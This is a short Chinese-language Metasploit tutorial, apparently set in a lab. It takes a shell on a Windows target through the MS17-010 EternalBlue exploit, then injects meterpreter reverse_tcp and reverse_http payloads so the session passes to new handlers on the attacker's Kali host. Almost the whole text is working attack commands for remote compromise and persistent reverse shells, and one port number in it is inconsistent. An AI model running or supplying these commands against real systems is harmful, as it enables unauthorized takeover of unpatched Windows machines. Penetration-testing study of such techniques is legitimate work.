首先是通过ms17_010永恒之蓝拿下shell,192.168.50.146为受害者靶机,192.168.50.130为kali的ip
- set autorunscript post/windows/manage/migrate name=services.exe
- set payload windows/x64/meterpreter/reverse_tcp
- set lport 5577
- set lhost 192.168.50.130
- use exploit/windows/smb/ms17_010_eternalblue
- set rhost 192.168.50.146
- set rport 445
- exploit -j -z
接下来在另外的msf里,做好监听3333:
handler -H 192.168.50.130 -P 3333 -p windows/meterpreter/reverse_tcp然后在上面的meterpreter 里:
- use exploit/windows/local/payload_inject
- set payload windows/meterpreter/reverse_tcp
- set lhost 192.168.50.130
- set lport 3333
- set DisablePayloadHandler True
- set PrependMigrate True
- set session 1
- run
这样就可以退出使用ms17_010拿下的session了
如上使用的是reverse_tcp,其实reverse_http,也是一样的可以:
在另外的msf里,做好监听7777:
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_http
- set lhost 192.168.50.130
- set lport 18080
- set ExitOnSession false
- set SessionExpirationTimeout 0
- set SessionCommunicationTimeout 0
- exploit -j -z
然后在旧session里派生:
- use exploit/windows/local/payload_inject
- set payload windows/meterpreter/reverse_http
- set lhost 192.168.50.130
- set lport 18080
- set DisablePayloadHandler True
- set PrependMigrate True
- set session 1
- run
run后大概需要15-20秒才能完全建立新session.